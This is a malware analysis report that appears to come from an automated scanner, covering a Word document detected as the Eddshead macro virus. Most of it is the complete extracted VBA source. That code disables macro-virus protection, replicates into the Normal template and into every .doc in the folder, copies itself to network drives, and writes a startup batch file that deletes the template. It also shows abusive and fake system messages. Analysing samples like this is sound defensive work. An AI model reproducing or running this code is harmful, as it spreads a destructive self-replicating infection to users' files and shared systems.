MALICIOUS
Risk Score: 256

Heuristics (6)

- ClamAV: Win.Trojan.Pivis-2 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
  Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: .VirusProtection = False
- AutoOpen macro [low] OLE_VBA_AUTOOPEN
  AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Auto_Close macro [low] OLE_VBA_AUTOCLOSE
  Auto_Close macro
  Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28108 bytes |

SHA-256: c1a79d34fdf061bcc5b7933cbbe56d2c36c5a96c799b433212206df87650a4a2
Detection: ClamAV: Doc.Trojan.Edds-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Eddshead"
Public Skip As Integer
Sub Eddshead()
' This is the first release of the eddshead MARCO virii
' Greetings go out to, Mr. Pink, Mr. blonde, Mr. Brown
' Mr. Blue and need we forget Mr. Orange (you still own me £10)
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "eddie.doc"
If sv = 3 Then svt$ = "orange.doc"
If sv = 2 Then svt$ = "pink.doc"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
ActiveDocument.ReadOnlyRecommended = False
rm = Int(Rnd * 100)
If rm = 99 Then MsgBox "Your Computer Has The EddsHead Marco Virii", vbSystemModal
If rm = 10 Then MsgBox "Mr. Goodall is a cunt, watch your children!", vbSystemModal
If Month(Now()) = 11 And Day(Now()) = 4 Then MsgBox "Happy Birthday Edd", vbInformation, "Birthday Greeting!!!"
If Month(Now()) = 2 And Day(Now()) = 2 Then MsgBox "Your hard drive is being formated", vbInformation, "System notice"
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Nice Guy Eddie"
.Subject = "Eddshead Marco Virii"
.Comments = "Who did you get this document from ??"
.Execute
End With
x81333293 = 0
Set cy329813311 = MacroContainer
f1516$ = "c:\windows\startm~1\programs\startup\msfile.bat"
j3283329 = GetAttr(NormalTemplate.FullName)
If j3283329 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f1516$)
If j3283329 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f1516$)
If j3283329 = vbReadOnly Then GoTo orange
If j3283329 = vbReadOnly + vbArchive Then GoTo orange
If cy329813311 = NormalTemplate Then x81333293 = 1
If x81333293 = 1 Then r486813310 = NormalTemplate.FullName Else r486813310 = ActiveDocument.FullName
If x81333293 = 1 Then domeharderbaby32910 = ActiveDocument.FullName Else domeharderbaby32910 = NormalTemplate.FullName
Application.OrganizerCopy Source:=r486813310, Destination:=domeharderbaby32910, Name:="Eddshead", Object:=wdOrganizerObjectProjectItems
If x81333293 = 1 And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If x81333293 = 0 Then
If NormalTemplate.Saved = False Then NormalTemplate.Save
End If
Call dhIconDisco("C:\autorun.inf")
orange:
End Sub
Sub HelpAbout()
On Error Resume Next
MsgBox "Eddshead", vbInformation
End Sub
Sub FileNew()
On Error Resume Next
Call Eddshead
Dialogs(wdDialogFileNew).Show
Skip = 1
Call Eddshead
End Sub
Sub FileSave()
On Error Resume Next
Call Eddshead
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call Eddshead
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsOptions()
On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
Call Eddshead
End Sub
Sub EditFind()
On Error Resume Next
Dialogs(wdDialogEditFind).Show
Call Eddshead
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call Eddshead
End Sub
Sub FilePrint()
On Error Resume Next
Dialogs(wdDialogFilePrint).Show
Call Eddshead
End Sub
Sub FileExit()
On Error Resume Next
Call Eddshead
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Eddshead
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Eddshead
End If
Loop
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
Application.Quit
End Sub
Sub AutoOpen()
On Error Resume Next
Call Eddshead
End Sub
Sub AutoExit()
On Error Resume Next
Call Eddshead
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Eddshead
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Eddshead
End If
Loop
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
Sub AutoExec()
On Error Resume Next
Call Eddshead
End Sub
Sub AutoClose()
On Error Resume Next
Call Eddshead
End Sub
Sub ToolsMacro()
On Error Resume Next
Call Eddshead
Call p3283
End Sub
Sub FileTemplates()
On Error Resume Next
Call Eddshead
Call p3283
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Eddshead
Call p3283
End Sub
Sub p3283()
On Error Resume Next
Selection.HomeKey Unit:=wdStory
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "."
.Replacement.Text = "Eddshead"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = True
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
End Sub
Sub vBitchES(strFile As String)
Dim hFile As Long
On Error Resume Next
n$ = NormalTemplate
Part11$ = "attrib -h -r "
snag$ = "c:\progra~1\micros~1\templa~1\"
snag1$ = "c:\progra~1\micros~2\templa~1\"
Part2$ = "del "
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, Part11$ + snag$ + n$
Print #hFile, Part11$ + snag1$ + n$
Print #hFile, Part2$ + snag$ + n$
Print #hFile, Part2$ + snag1$ + n$
Print #hFile, "cls"
Print #hFile, Part2$ + "c:\windows\startm~1\programs\startup\msfile.bat"
Close hFile
End Sub
Sub dhIconDisco(strFile As String)
Dim hFile As Long
On Error Resume Next
Randomize
Choice = Int(Rnd * 2)
rnn$ = Int(Rnd * 66) + 2
rn$ = Int(Rnd * 27) + 1
Part1$ = "[autorun]"
Part2$ = "icon = c:\windows\system\pifmgr.dll,"
Part22$ = "icon = c:\windows\SYSTEM\shell32.dll,"
Part3$ = Part2$ + rn$
Part33$ = Part22$ + rnn$
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, Part1$
If Choice = 0 Then
Print #hFile, Part3$
Else
Print #hFile, Part33$
End If
Close hFile
End Sub
' Processing file: /tmp/qstore_780j9mv3
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Eddshead - 13060 bytes